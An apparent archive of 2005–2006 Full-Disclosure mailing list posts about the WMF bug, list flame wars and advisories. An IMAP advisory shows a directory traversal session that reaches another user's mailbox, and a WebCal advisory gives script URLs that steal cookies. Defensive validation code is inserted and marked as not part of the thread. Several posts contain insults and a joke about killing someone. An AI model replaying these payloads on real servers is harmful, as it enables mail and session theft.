 claiming SetAbortProc() was a purpose placed backdoor...

 *puff*puff*


Re: [Full-disclosure] Steve Gibson smokes crack?

2006-01-13 Thread Stan Bubrouski
On 1/13/06, Todd Towles [EMAIL PROTECTED] wrote:

 Stan wrote:
  Ordinarily I'd argue, but it's hard to when we find out
  Microsoft knew about the bug for a long time and made a
  conscious decision not to patch it even though they knew it
  could lead to a system compromise.

 Conscious decision? So you are in the Microsoft meetings? Do
 tell...didn't think so. They may have known about it, but many huge

Do you often ask and answer your own questions?

 companies have security problems in their software..some are so embedded
 in the system or related to how the program works..that they will do
 anything to protect it.


Why talk about hypotheticals when the thread is about the real thing?

 Why didn't this get thrown up with the Cisco/Lynn outcry? Oh...because

Yeah cause Cisco has lots to do with SetAbortProc...

 hitting on Microsoft gets you more attention perhaps...


Yeah cause threads like this really open people's eyes...


Don't get thrown off your high horse now,
sb

 -Todd



Re: [Full-disclosure] Steve Gibson smokes crack?

2006-01-13 Thread Stan Bubrouski
On 1/13/06, Todd Towles [EMAIL PROTECTED] wrote:

 Stan wrote:
  Ordinarily I'd argue, but it's hard to when we find out
  Microsoft knew about the bug for a long time and made a
  conscious decision not to patch it even though they knew it
  could lead to a system compromise.

 Also, Microsoft must have made the conscious decision to have it not work
 by default on any pre-Windows 2000 machine? What kind of old secret
 government backdoor is that...when it doesn't even work.

Here's a quote from me:
they knew about the bug months before it was reported in
December.

Where does it mention some government conspiracy dating back to the
late 90's? Oh wait it doesn't... Todd chill out, you'll end up in
cardiac ward if you're getting this worked up over the facts.  I could
have said you planted the bug :-)

-sb


 -Todd



Re: [Full-disclosure] Steve Gibson smokes crack?

2006-01-13 Thread Stan Bubrouski
I wasn't agreeing it's a conspiracy I was just saying they knew about
this being serious for a while and did nothing about it until it went
public for whatever reason.

-sb

On 1/13/06, bkfsec [EMAIL PROTECTED] wrote:
 Stan Bubrouski wrote:

 Ordinarily I'd argue, but it's hard to when we find out Microsoft knew
 about the bug for a long time and made a conscious decision not to
 patch it even though they knew it could lead to a system compromise.
 
 People commented on how Microsoft put out a patch quicker than they
 usually would but this is NOT THE CASE.  According to Microsoft
 itself, they knew about the bug months before it was reported in
 December.  Don't give credit where it's not earned...
 
 
 
 I'm going to try to walk the line here.  I loathe defending Microsoft,
 and I'm not defending them for their historical conduct, but I still
 can't see conspiracy theories being accurate yet.

 A few incidents (NSA backdoor) aside, Microsoft's history with
 security has been one of ineptness, not maliciousness per se.  This is
 their history going back to before they purchased IE, and something that
 became really evident when they first began rebuilding Mosaic.  The WMF
 bug is in line with their development methodology up until (and in some
 ways including) recently.  Microsoft's development mantra was, for a
 long time, ease of use at the expense of everything else.  When NT came
 out and Microsoft moved from producing OS' that were not network ready
 out of the box and toy-like GUI infrastructures, the impacts of that
 strategy were transposed onto administrators and users (now more
 vulnerable than ever) alike.

 Ease of use became Ease of administration, and that became Ease of
 development.  Netscape and Sun were threatening Microsoft's monopolistic
 paradigm with a new platform for application development that was easily
 cross-platform and as a result, IE had to become an even more robust
 method of distributing application and administration capabilities.

 We now see the fallout of that decision.  The web browser was never
 meant to be an application subsystem - it was meant to interpret text
 documents into more visual documents organized in a linked fashion.  It
 was never meant to run code on systems, but that's what it's become.
 The act of making that easier attracted every simpleton web developer
 who couldn't hack it anywhere else.  Administrators saw ActiveX as a way
 to remotely administrate PCs they couldn't get to in any other way.
 These were mistakes... big mistakes from a security standpoint.  But
 security was second to attracting new fresh bodies who could fill the
 seats and drone on endlessly about how awesome Microsoft was.

 And this pattern is what I see here -- ineptness in the interests of
 feature-creep.

 It's one thing to say that they sat on the knowledge that this was
 exploitable.  It's another thing entirely to claim that they knowingly
 made it for the point of exploiting PCs if ActiveX was disabled.

 Given their history and the hallmarks of this flaw, I have a hard time
 making that leap.

  -bkfsec





Re: [Full-disclosure] Worm?

2006-01-13 Thread Stan Bubrouski
From your extremely detailed query I'd have to say the NSA.  That of
course is based on nothing.

-sb

On 1/13/06, Byrne, David [EMAIL PROTECTED] wrote:


 Our IPS vendor is reporting a number of customers affected by large volumes
 of traffic generated by a worm. Anyone have details?


 Thanks,

 David Byrne

 Corporate IT Security

 EchoStar Satellite L.L.C.

 720-514-5675

 [EMAIL PROTECTED]




Re: [Full-disclosure] Steve Gibson smokes crack?

2006-01-13 Thread Stan Bubrouski
Back to the original subject:
[Full-disclosure] Steve Gibson smokes crack?

Does anyone know if Steve Gibson does indeed smoke crack?  If Marion
Barry does, why can't he?  These questions need answers!  Or not,
happy friday, drink up.

-sb

On 1/13/06, eric williams [EMAIL PROTECTED] wrote:
 On 13 Jan 2006 14:31:06 -0800, Randal L. Schwartz merlyn@stonehenge.com wrote:
   Morning == Morning Wood [EMAIL PROTECTED] writes:
 
  Morning http://aolradio.podcast.aol.com/sn/SN-022.mp3
  Morning claiming SetAbortProc() was a purpose placed backdoor...
 
  I've heard that WINE suffers from the same exploit.  How could
  it be a microsoft conspiracy if WINE (implemented from API docs)
  does the same thing?
 
 Randal,

 Thanks.  That is precisely the point I have been trying to make,
 however, the question is I gather flowing from the Gibson commentary,
 how or what exactly causes WINE to execute the code pointed at by the
 SetAbortProc record?  Is it the incorrect record length, is it some
 other munged input, is it by design which has also been alluded to,
 and seems to be your reference here.

 IOW, does anyone know the circumstances, in all cases, where the bug is
 triggered or is there only speculation based upon exploit code
 working against a given vulnerable implementation of the API?

 I know I am speculating, but is there or has there been a canonical
 analysis done by anyone?

 -e
  --
  Randal L. Schwartz - Stonehenge Consulting Services, Inc. - +1 503 777 0095
  merlyn@stonehenge.com URL:http://www.stonehenge.com/merlyn/
  Perl/Unix/security consulting, Technical writing, Comedy, etc. etc.
  See PerlTraining.Stonehenge.com for onsite and open-enrollment Perl training!


Re: [Full-disclosure] How to Determine My System Vulnerabilities

2006-01-10 Thread Stan Bubrouski
This is not the right list for this kind of question.  How you managed
to find this list but not the answers you are looking for from google is
astounding (no offense intended, this is a list to discuss the full
disclosure of vulnerabilities).

-sb

On 1/10/06, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote:

 I have three servers running Linux Red Hat OS.  I would like to find a source
 for information regarding How To when it comes to determining what level
 of kernel, SSH, PHP, etc. my servers are running.  I do know how to check
 some of these things but am looking for someone who is very knowledgeable and
 is willing to answer questions about this OS.

  Gene Smith
 Federal Reserve Bank of Minneapolis
 IT/ Telecom  612 204 6355


Re: [Full-disclosure] PoC for the 2 new WMF vulnerabilities (DoS)

2006-01-09 Thread Stan Bubrouski
I read that and couldn't stop laughing.  More from the I don't need
to get it to explain it doctrine.  It gets a gold star for effort, I
wonder if he pulled out a thesaurus.

-sb

On 1/9/06, Danny [EMAIL PROTECTED] wrote:
removed inane banter

 Is this what you are referring to:

 http://blogs.technet.com/msrc/archive/2006/01/09/417198.aspx

 ...D

more crap snipped


Re: [Full-disclosure] infosecbofh

2006-01-05 Thread Stan Bubrouski
Oh where to begin...

On 1/5/06, Joe Average [EMAIL PROTECTED] wrote:
 I guess he got bored of turning netdev into public enemy number one, to

You are n3td3v, and talking in the third person under an assumed
identity just adds to your own turmoil.

 divert attention away from the real guy who is messing up the list, none

Yep infosecbofh, joe average, n3td3v, etc... are a nuisance, but in
infosecbofh's defense he seems to be using only one email account to
torture his victims.

 other than the guy who has never released any security vulnerabilities... I
 present to you...mr infosecbofh...round of applause!

You keep coming back to this but all you ever find is XSS in sites,
not even in products or such.  I'm not putting down what you do, but
you act like it's so important and that it makes you more important
even though it doesn't.  Also, it's hard to be sympathetic for you
getting picked on when you *clearly* try to instigate situations at
every turn, and when n3td3v isn't mentioned in a thread you bring him
up, and he's you so what can you expect?

Please stop responding to this crap, it's no secret you want it to
continue so your name gets more hits on google, but the rest of us
could care less about you or problems with everyone who ever
contradicts you.  Stay in school and shut up.  PLEASE.

Best Regards,
sb


Re: [Full-disclosure] infosecbofh

2006-01-05 Thread Stan Bubrouski
On 1/5/06, Joe Average [EMAIL PROTECTED] wrote:
 Why are you mentioning n3td3v? This thread is about infosecbofh, please keep

First of all:
Joe Average to Frank, full-disclosure  11:28 am (4 hours ago)
I guess he got bored of turning netdev into public enemy number one,
to divert attention away from the real guy who is messing up the list,
none other than the guy who has never released any security
vulnerabilities... I present to you...mr infosecbofh...round of
applause!

You brought up netdev.  You keep bringing him up, it's not the other
way around.  You are netdev and that's what's so fucking annoying.  You
pretend to be someone else to defend yourself.  WE ALL GET IT.

 on topic. I don't believe the two XSSing vulnerabilities on Google Groups are
 all netdev is responsible for. Look closer into what's going on. There's a
 world of conspiracy out there to be had. Let's not argue among ourselves.


No there isn't a conspiracy against you, there is a public outcry for
you to shut up and stop making up false conspiracies about yourself
and your other alias and stop wasting everyone's time.

 The Sober.z variant will be attacking tomorrow and speculation that it'll
 have a WMF exploit payload is already sweeping the underground. I think we

Why?  Are you suddenly going to claim you're also Nick Fitzgerald, or
that you have a clue because you read daily RSS feeds from Yahoo?

 should be concentrating on that kind of thing, than arguing on really low
 priority topics like who is more of a disruption than who on a mailing list.


You pretty much always instigate and drive off topic any thread that
is serious these days, why should you receive any courtesy?  I mean
you brought up netdev in this thread, I called you on it and now you
claim I brought netdev up.  You're a liar and a kid who still needs to
grow up before he tells his classmates to do the same.

 Take care now.


Stay in school.

-sb


Re: [Full-disclosure] MS Patch Release for WMF Issue

2006-01-05 Thread Stan Bubrouski
I can confirm the patch appears on Windows Update for my win2k SP4 machine.

-sb

On 1/5/06, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote:
 Looks as if MS is issuing a fix out of band for the WMF issue. Should be 
 available at 5:00 PM EST today.

 

 
 Title: Microsoft Security Response Center Bulletin Notification
 Issued: January 05, 2006
 

 Summary
 ===
 Important Information for Thursday 5 January 2006

 Microsoft announced that it would release a security update to help
 protect customers from exploitations of a vulnerability in the
 Windows Meta File (WMF) area of code in the Windows operating system
 on Tuesday, January 2, 2006, in response to malicious and criminal
 attacks on computer users that were discovered last week.

 Microsoft will release the update today on Thursday, January 5, 2006,
 earlier than planned.

 Microsoft originally planned to release the update on Tuesday,
 January 10, 2006 as part of its regular monthly release of security
 bulletins, once testing for quality and application compatibility
 was complete.  However, testing has been completed earlier than
 anticipated and the update is ready for release.

 In addition, Microsoft is releasing the update early in response to
 strong customer sentiment that the release should be made available
 as soon as possible.

 Microsoft's monitoring of attack data continues to indicate that the
 attacks are limited and are being mitigated both by Microsoft's
 efforts to shut down malicious Web sites and with up-to-date
 signatures from anti-virus companies.

 The security update will be available at 2:00 pm PT as MS06-001.

 Enterprise customers who are using Windows Server Update Services
 will receive the update automatically.  In addition, the update is
 supported by Microsoft Baseline Security Analyzer 2.0, Systems
 Management Server, and Software Update Services.  Enterprise
 customers can also manually download the update from the Download
 Center.

 Microsoft will hold a special Web cast on Friday, January 6, 2006,
 to provide technical details on the MS06-001 and to answer questions.
 Registration details will be available at
 http://www.microsoft.com/technet/security/default.mspx.

 Microsoft will also be releasing additional security updates on
 Tuesday, January 10, 2006 as part of its regularly scheduled release
 of security updates.

 What is this alert?

 As part of the monthly security bulletin release cycle, Microsoft
 provides advance notification to our customers on the number of new
 security updates being released, the products affected, the
 aggregate maximum severity and information about detection tools
 relevant to the update. This is intended to help our customers plan
 for the deployment of these security updates more effectively.

 In addition, to help customers prioritize monthly security updates
 with any non-security updates released on Microsoft Update, Windows
 Update, Windows Server Update Services and Software Update Services
 on the same day as the monthly security bulletins, we also provide:

 .   Information about the release of updated versions of the
 Microsoft Windows Malicious Software Removal Tool.
 .   Information about the release of NON-SECURITY, High Priority
 updates on Microsoft Update (MU), Windows Update (WU), Windows
 Server Update Services (WSUS) and Software Update Services (SUS).
 Note that this information will pertain ONLY to updates on Windows
 Update and only about High Priority, non-security updates being
 released on the same day as security updates. Information will NOT
 be provided about Non-security updates released on other days.

 On 10 January 2006 Microsoft is planning to release:

 Security Updates
 .   1 Microsoft Security Bulletin affecting Microsoft Windows. The
 highest Maximum Severity rating for these is Critical. These updates
 may require a restart. These updates will be detectable using the
 Microsoft Baseline Security Analyzer (MBSA).
 .   1 Microsoft Security Bulletin affecting Microsoft Exchange and
 Microsoft Office. The highest Maximum Severity rating for these is
 Critical. These updates may require a restart. These updates will be
 detectable using the Microsoft Baseline Security Analyzer (MBSA).

 Microsoft Windows Malicious Software Removal Tool
 .   Microsoft is planning to release an updated version of the
 Microsoft Windows Malicious Software Removal Tool on Windows Update,
 Microsoft Update, Windows Server Update Services and the Download
 Center.
 Note that this tool will NOT be distributed using Software Update
 Services (SUS).

 Non-security High Priority updates on MU, WU, WSUS and SUS
 .   Microsoft is planning to  release 1 NON-SECURITY High-Priority
 Update on Windows Update 

Re: [Full-disclosure] Rockliffe Directory Transversal Vulnerability

2006-01-04 Thread Stan Bubrouski
Seeing as most IMAP servers allow you to use ../../ with SELECT, etc..
(think uw-imapd for example) I think I would categorize this as more
of a permissions problem.

-sb

On 1/4/06, Josh Zlatin [EMAIL PROTECTED] wrote:
 Synopsis: Rockliffe's Mailsite Imap Directory Transversal Vulnerability.

 Product: Rockliffe Mailsite
  http://www.rockliffe.com

 Version: Confirmed on Mailsite  6.1.22.1

 Author: Josh Zlatin-Amishav

 Date: January 4, 2006

 Background:
 Rockliffe MailSite secure email server software and MailSite MP secure email
 gateways provide email server solutions and gateway email protection for
 businesses and service providers. Rockliffe has more than 3,000 customers
 hosting more than 15 million mailboxes worldwide.

 Issue:
 In working with researchers at Tenable Network Security, I have come across
 a directory transversal flaw in the IMAP server. It is possible for an
 authenticated user to access any user's inbox via a RENAME command.

 PoC:

 [EMAIL PROTECTED]:~$ telnet 10.0.0.5 143
 Trying 10.0.0.5...
 Connected to 10.0.0.5.
 Escape character is '^]'.
 * OK  MailSite IMAP4 Server 6.1.22.0 ready
 a1 login joe pass
 a1 OK LOGIN completed
 a2 rename ../../josh/INBOX gotcha
 a2 OK RENAME folder ../../josh/INBOX renamed to gotcha
 a3 select gotcha
 * FLAGS (\Answered \Flagged \Deleted \Seen \Draft)
 * 0 EXISTS
 * 0 RECENT
 * OK [PERMANENTFLAGS (\Answered \Flagged \Deleted \Seen \Draft \*)]
 * OK [UNSEEN 0]
 * OK [UIDVALIDITY 514563061] UIDs are valid
 a3 OK [READ-WRITE] opened gotcha

 user joe can now access the contents of user josh's INBOX directory.

 Vendor notified: January 3, 2006 06:12AM

 Vendor Response:
 Contact your sales rep about purchasing Mailsite 7.0.3.1

 Solution:
 Mailsite fixed a buffer overrun in the Mailsite IMAP server which also fixes
 the directory transversal problem. Either upgrade to version 6.1.22 and
 install the hotfix (i.e. upgrade to 6.1.22.1), or install the latest version of
 Mailsite. The hotfix can be obtained at:

 ftp://ftp.rockliffe.com/MailSite/6.1.22/Hotfixes/MailSiteServicePack.exe

 References: http://www.rockliffe.com
 References: http://zur.homelinux.com/Advisories/RockliffeMailsiteDirTransveral.txt
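
Added example (not part of the original thread, and not Rockliffe's code): one way a server can confine the mailbox names given to RENAME and SELECT to the authenticated user's own mail root, replayed against the command lines from the PoC above. The storage root, the function names and the response texts are assumptions made for the illustration; the check complements filesystem permissions and does not replace them.

```python
import posixpath
import re

# Assumed storage layout for the illustration: <MAIL_ROOT>/<user>/<mailbox>
MAIL_ROOT = "/srv/mailstore"


class MailboxError(ValueError):
    """Raised when a client-supplied mailbox name is not acceptable."""


_CONTROL = re.compile(r"[\x00-\x1f\x7f]")
_SEPARATORS = re.compile(r"[/\\]")   # treat both separator styles alike
_DRIVE = re.compile(r"^[A-Za-z]:")   # Windows drive prefix such as C:


def resolve_mailbox(user, name, root=MAIL_ROOT):
    """Map a mailbox name to a path below root/user, or raise MailboxError.

    `user` is the authenticated login name and is assumed to have been
    validated at LOGIN time; only `name` is attacker-controlled here.
    """
    if not name or _CONTROL.search(name):
        raise MailboxError("empty name or control character")
    if name[0] in "/\\" or _DRIVE.match(name):
        raise MailboxError("absolute path")
    parts = _SEPARATORS.split(name)
    if any(p in ("", ".", "..") for p in parts):
        raise MailboxError("empty, '.' or '..' path component")
    home = posixpath.join(root, user)
    path = posixpath.normpath(posixpath.join(home, *parts))
    # Defence in depth: even after the component check, confirm containment.
    if posixpath.commonpath([home, path]) != home:
        raise MailboxError("escapes the user's mail root")
    return path


def handle_command(user, line):
    """Validate every mailbox argument of RENAME/SELECT before acting.

    Quoted strings and IMAP literals are out of scope for this sketch;
    arguments are split on whitespace.
    """
    tokens = line.split()
    if len(tokens) < 2:
        return "* BAD missing tag or command"
    tag, cmd, args = tokens[0], tokens[1].upper(), tokens[2:]
    expected = {"RENAME": 2, "SELECT": 1}.get(cmd)
    if expected is None or len(args) != expected:
        return f"{tag} BAD unsupported command or wrong argument count"
    try:
        paths = [resolve_mailbox(user, arg) for arg in args]
    except MailboxError as exc:
        return f"{tag} NO {cmd} refused: {exc}"
    return f"{tag} OK {cmd} would act on {' -> '.join(paths)}"


# The first two lines are the commands shown in the advisory's PoC;
# the remaining three are constructed for this example.
SESSION = [
    "a2 rename ../../josh/INBOX gotcha",
    "a3 select gotcha",
    r"a4 select ..\..\josh\INBOX",
    "a5 select /srv/mailstore/josh/INBOX",
    "a6 rename INBOX/old Archive/2005",
]


def replay(user="joe"):
    """Run the sample session as the authenticated user and collect replies."""
    return [handle_command(user, line) for line in SESSION]


if __name__ == "__main__":
    for line, reply in zip(SESSION, replay()):
        print(f"C: {line}\nS: {reply}")
```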


Re: [Full-disclosure] Buffer Overflow vulnerability in Windows Display Manager [Suspected]

2006-01-02 Thread Stan Bubrouski
Well if you look at the fact there is no title on titlebar and the
fact the active tab is Untitled, I'd hazard to guess its something he
manually entered into the address bar, and so we don't even know if
this is exploitable by clicking a link or whatnot.

Not exactly sure why this was posted if no details are provided. 
Anything else for us Sumit?

-sb

On 1/2/06, Lise Moorveld [EMAIL PROTECTED] wrote:
 Dear Sumit,

 Could you tell me how you exploited this buffer
 overflow issue in Firefox so I can try and reproduce
 it? I notice a lot of A's in your address bar but I'm
 not sure whether that's it and if so, how many A's are
 used.

 Regards,

 Lise

 --- Sumit Siddharth [EMAIL PROTECTED] wrote:

  Hi,
  The Windows display manager crashes when a BOF is
  attempted on a mozilla
  firefox.
  This has different results on different windows
  machine.
  In Windows XP only the display manager crashes ,
  whereas on a Windows 2000
  server the BSOD(Blue screen of death )appears and
  the system hangs.
  I am using Firefox 1.0.6. I think that the bug is in
  the display driver and
  not with firefox. Kindly find a screen shot attached
  with this email.
 
  Thanks
  Sumit
 
 
  --
 
  Sumit Siddharth
  Information Security Analyst
  NII Consulting
  Web: www.nii.co.in
  
  NII Security Advisories
  http://www.nii.co.in/resources/advisories.html
  





Re: [Full-disclosure][WAY OFF TOPIC] complaints aboutthegovernemntspying!

2005-12-31 Thread Stan Bubrouski
Personally I'm not opposed to the killing of J.A. if it will end this
quietly ;-)

-sb

On 12/31/05, J.A. Terranson [EMAIL PROTECTED] wrote:


 On Fri, 30 Dec 2005, InfoSecBOFH wrote:

  You know what.  Who gives a fuck about any of this.
 
  I am an American.  We have the bombs, we have the money.  We have the
  balls to use them.

 remainder of Redneck Toilet Speech elided

 So, remind us again, why is it that killing Americans such as yourself
 should be looked at as a bad thing?

 --
 Yours,

 J.A. Terranson
 [EMAIL PROTECTED]
 0xBD4A95BF


 'The right of self defence is the first law of nature: in most governments
 it has been the study of rulers to confine this right within the narrowest
 limits possible. Wherever standing armies are kept up, and the right of
 the people to keep and bear arms is, under any colour or pretext
 whatsoever, prohibited, liberty, if not already annihilated, is on the
 brink of destruction.'

 St. George Tucker



Re: [Full-disclosure] Spy Agency Mined Vast Data Trove

2005-12-28 Thread Stan Bubrouski
It's amazing nobody has brought up the fact that Bush was illegally
monitoring domestic and international calls during a presidential
election.  He could have been listening to the Kerry camp's calls. 
Worse we'll never know because without a judge's approval there is no
official paper trail.  It's completely baffling that Clinton was
almost impeached for lying about an affair, but Bush stole our civil
rights, illegally monitored us, and will continue to do so forever
since his perpetual war on terror technically will never end unless
everyone who hates the United States is eliminated.

What a fucking traitor,
sb

On 12/28/05, Rodrigo Barbosa [EMAIL PROTECTED] wrote:

 I was going to reply to all that stuff you wrote, but since you are
 so intent of showing that you know nothing about how things work on
 other countries, I'll just reply to one statement, that seems to be
 the heart of the issue.

 On Wed, Dec 28, 2005 at 08:46:11AM -0600, Leif Ericksen wrote:
  Now is your traffic legit?  Are you moving legal money around? Are you a
  drug dealer legal or otherwise?  Are you a dealing with other items that
  might be illegal in the US and are trying to get them here via Canada?

 Guilty until proven innocent, is that what you mean ?

 []s
 - --
 Rodrigo Barbosa [EMAIL PROTECTED]
 Quid quid Latine dictum sit, altum viditur
 Be excellent to each other ... - Bill & Ted (Wyld Stallyns)




Re: [Full-disclosure] Moreover Robert Lemos

2005-12-27 Thread Stan Bubrouski
So let me get this straight.  SecurityFocus doesn't think you're worth
their time and so they must not be hackers... I'd say I was confused
but sadly I think I get it.

-sb

On 12/27/05, Joe Average [EMAIL PROTECTED] wrote:

 This mail was sent on behalf of the n3td3v group.


 It goes without saying that some online security journalists can go for years
 with inserting a certain catchphrase into their articles and not realise
 what's going on. Aw, well, since the netdev group have fallen out with
 Securityfocus (Robert Lemos) & C|Net (Joris Evers) who think they can report
 on hackers and never be involved or hacked by their existence, then now's the
 time to wake up.



 (Both your sites are vulnerable from hijacking, cross site scripting, and
 other bad coding, thanks for your time.



 Yours Truly


 The international hackers you report about on your site all the time,


 n3td3v
 (Team of security professionals from around the world)






Re: [Full-disclosure] I never said Moreover Robert Lemos

2005-12-27 Thread Stan Bubrouski
What does Robert Lemos saying Moreover have anything to do with security?
And what is your obsession with slandering and discrediting people who
actually have jobs and accomplished more than copied and pasted
e-mails like you anyways.

Moreover, you are n3td3v.

-sb



On 12/27/05, Joe Average [EMAIL PROTECTED] wrote:
 I am not a Security Journalist who has said Moreover for the last 20
 years, how dare you say such a thing!

 Securityfocus.com and News.com have such a good reputation for not saying
 Moreover

 Results 1 - 10 of about 29,100 for robert lemos moreover . (0.04 seconds)

 http://www.google.com/search?q=robert+lemos+moreover




Re: [Full-disclosure] I never said Moreover Robert Lemos

2005-12-27 Thread Stan Bubrouski
So what?  I don't care if the guy eats babies for breakfast, personal
attacks have nothing to with security or any topic covered on this
list.

-sb

On 12/28/05, InfoSecBOFH [EMAIL PROTECTED] wrote:
 In his defence.  Lemos is kind of a fuckbag

 On 12/27/05, Stan Bubrouski [EMAIL PROTECTED] wrote:
  What does Robert Lemos saying Moreover have anything to do with security?
  And what is your obsession with slandering and discrediting people who
  actually have jobs and accomplished more than copied and pasted
  e-mails like you anyways.
 
  Moreover, you are n3td3v.
 
  -sb
 
 
 
  On 12/27/05, Joe Average [EMAIL PROTECTED] wrote:
   I am not a Security Journalist who has said Moreover for the last 20
   years, how dare you say such a thing!
  
   Securityfocus.com and News.com have such a good reputation for not saying
   Moreover
  
   Results 1 - 10 of about 29,100 for robert lemos moreover . (0.04 seconds)
  
   http://www.google.com/search?q=robert+lemos+moreover
  
  
 



Re: [Full-disclosure] Breaking LoJack for Laptops

2005-12-26 Thread Stan Bubrouski
Hehe I noticed that and didn't bother telling you ;-P

-sb

On 12/25/05, Bob Hacker [EMAIL PROTECTED] wrote:
 sorry i misplaced your post with your reality, I replied simply with...

 Bob Hacker to Stan, Dec 24 (1 day ago)

 It's outstanding, I was being sarcastic just out of context. Happy New
 Year List !

 =)
 !Z

 I replied to stan not the list. Guess I should Have.

 On Sun, 25 Dec 2005 13:38:15 -0800 Bob Hacker [EMAIL PROTECTED] wrote:

 Let me clarify this to you and others who don't understand the
 slightest about much. Allowing 192* to be called from is absurd. And
 it's not that hard to whois the ip, contact the isp who now these days
 hand over information to almost *anyone with a nice fancy letterhead
 from a lawyers office. Saying

 In case you didn't realize it, the 192.168 range is private. Go whois
 yourself silly trying to find out. Better yet go ask around who is
 192.168.x.x for kicks.

 Dear Mr ISP bad person using this IP has stolen laptop that sold on ebay
 for 50bucks, please give us his address so we may take him to court and
 charge him with possession of stolen property, a misdemeanor in most
 states.

 For your information you seem to know little about how things work. Go
 ask any provider for information with any kind of letterhead you'd
 like. See what they will tell you. You seem to be stuck on stupid
 assuming a bonafide provider is going to budge simply because some
 letterhead. Without a court order you'd be wasting a piece of paper.

 Yes it's logical. But in theory I think the whole thing is like the MS
 key validate, disable it in windows add-ons and move on. It's like that
 one time at bandcamp when i was on a lan and didn't know my ip so i went
 to steve gibsons site.

 Wow you are so 31337 to run over to Gibson's site. Case in point no
 need to further clarify anything on my original post. Don't make an ass
 out of yourself responding when you have one half of one half of a
 smidgen of a clue.

 Note. I am sure anyone who has a purchased a stolen laptop , it had a
 password on it. So the OS was already installed. just my .02

 Instead of wasting time making yourself look more clueless you should
 take some time and actually run along and learn something productive.
 The message had nothing to do with a stolen laptop, it had to do with
 defeating its protection. Whether or not it had/has a password is
 irrelevant. And your last comment made no sense so take your two cents
 and buy yourself a clue.



Re: [Full-disclosure] Seasons Beatings

2005-12-17 Thread Stan Bubrouski
tinyurl has already closed that account due to abuse FYI  :)

-sb

On 12/17/05, Pieter de Boer [EMAIL PROTECTED] wrote:
 Morning Wood wrote:
  oh wow, fun toys for the holidays...
  http://tinyurl.com/9tz5g
 
  postcard.gif.exe
 
 A link to almost this same .exe has been spammed to me several times
 some weeks ago. There were a couple of bots in the Undernet-channels,
 but nothing really shocking. Suppose they're trying to get some more now ;)

 --
 Pieter




Re: [Full-disclosure] InfoSecBOFH and other trouble makers

2005-12-16 Thread Stan Bubrouski
I wonder if he's sending himself gmail invites...lol

-sb

On 12/15/05, sk / GroundZero [EMAIL PROTECTED] wrote:

 so pathetic, n3td0rk already has to invent imaginary people which are on his
 side.
 so its not always he against the FD list. oh well boy, you just prove once
 more how lame you are.
 look at his 31337 social engineering skills! has so awesome..

 but hey just in case you really really aren't n3td3v himself, let me speak
 with the words of your friend:
 you never have contributed anything security related to this list so you
 have no right to be on this list
 or something like that...

 your name is funny too Joe Average ..anyone knows John Doe ? :P

 - Original Message -
 From: Joe Average
 To: full-disclosure@lists.grok.org.uk

 Sent: Thursday, December 15, 2005 11:54 AM
 Subject: [Full-disclosure] InfoSecBOFH and other trouble makers


 please leave list unless you stop the abuse against netdev

  








[Full-disclosure] Advisory: XSS in WebCal (v1.11-v3.04)

2005-12-16 Thread Stan Bubrouski
Author: Stan Bubrouski
Date: December 16, 2005
Package: WebCal (by Michael Arndt; http://bulldog.tzo.org/webcal/webcal.html)
Versions Affected: 1.11-3.04 (unknown 1.11)
Severity: XSS allowing cookie theft, etc..

Description:
This particular WebCal (there are in fact over a dozen separate webcal
projects), suffers from cross-site scripting (XSS) vulnerabilities
using almost any parameters sent to any of the included CGI (perl)
scripts.  Here are a couple examples using version 3.04:

http://bulldog.tzo.org/perl/webcal.cgi?function=scriptalert(document.cookie)/scriptcal=public
http://bulldog.tzo.org/perl/webcal.cgi?function=webyearcal=publicyear=scriptalert(document.cookie)/script
http://bulldog.tzo.org/perl/webcal.cgi?function=webdaycal=publicdate=scriptalert(document.cookie)/script

These examples however are just the tip of the iceberg, there are many
many more.  For example you can put full scripts in new calendar
entries, as notes for entries, etc... there is no input validation.

Googling for this particular WebCal shows thousands of sites still run
it, and most of them are schools and colleges in the USA.  What is
scarier is that people are running this calendar on their main sites,
where they host webmail and other session-cookie based webapps.

Solution:
WebCal development ceased in early 2003, meaning nobody is going to be
updating it in all likelihood.  While it may be possible to patch all
the XSS holes, a better alternative would be to find a newer,
supported calendar program.  There are plenty of perl, PHP, and JSP
alternatives that should be considered.
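
Added example, not part of the original advisory and not WebCal code: a hypothetical Perl CGI-style handler showing the reflected-parameter pattern the advisory describes next to an allow-list plus output-encoding version. The parameter names are taken from the advisory's URLs; the function names, validation patterns and sample requests are assumptions made for this sketch.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Hypothetical handler, not WebCal source. Parameter names (function, cal,
# year, date) come from the advisory's URLs; the patterns are assumptions.
my %VALID = (
    function => qr/\A[a-z]{1,32}\z/,
    cal      => qr/\A[A-Za-z0-9_-]{1,64}\z/,
    year     => qr/\A\d{4}\z/,
    date     => qr/\A\d{8}\z/,
);

my %HTML_ENTITY = (
    '&' => '&amp;', '<' => '&lt;', '>' => '&gt;',
    '"' => '&quot;', "'" => '&#39;',
);

# Encode the characters that let text break out of element content or a
# quoted attribute. Apply at output time, including to stored entries/notes.
sub escape_html {
    my ($text) = @_;
    $text = '' unless defined $text;
    $text =~ s/([&<>"'])/$HTML_ENTITY{$1}/g;
    return $text;
}

# Split a query string into name/value pairs and URL-decode both.
sub parse_query {
    my ($query) = @_;
    my %param;
    for my $pair (split /[&;]/, $query) {
        my ($name, $value) = split /=/, $pair, 2;
        next unless defined $name && length $name;
        $value = '' unless defined $value;
        for ($name, $value) {
            tr/+/ /;
            s/%([0-9A-Fa-f]{2})/chr(hex($1))/ge;
        }
        $param{$name} = $value;
    }
    return %param;
}

# Vulnerable pattern: request data pasted into the page unchanged.
sub render_unsafe {
    my (%param) = @_;
    return "<h1>Calendar $param{cal}, year $param{year}</h1>\n";
}

# Hardened: unknown parameters and values failing the allow-list are
# rejected; accepted values are still encoded on output.
sub render_safe {
    my (%param) = @_;
    for my $name (sort keys %param) {
        my $rule = $VALID{$name};
        return "<p>Bad request</p>\n"
            unless $rule && $param{$name} =~ $rule;
    }
    return sprintf "<h1>Calendar %s, year %s</h1>\n",
        map { escape_html($_) } @param{qw(cal year)};
}

# Constructed sample requests (not captured traffic).
my @samples = (
    'function=webyear&cal=public&year=2005',
    'function=webyear&cal=public&year=%3Cscript%3Ealert(1)%3C%2Fscript%3E',
);
for my $query (@samples) {
    my %param = parse_query($query);
    print "query  : $query\n";
    print "unsafe : ", render_unsafe(%param);
    print "safe   : ", render_safe(%param);
    print "encoded: ", escape_html($param{year}), "\n\n";
}
```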


Re: [Full-disclosure] Famous n3td3v quotes - The Director's Cut (out now on DVD)

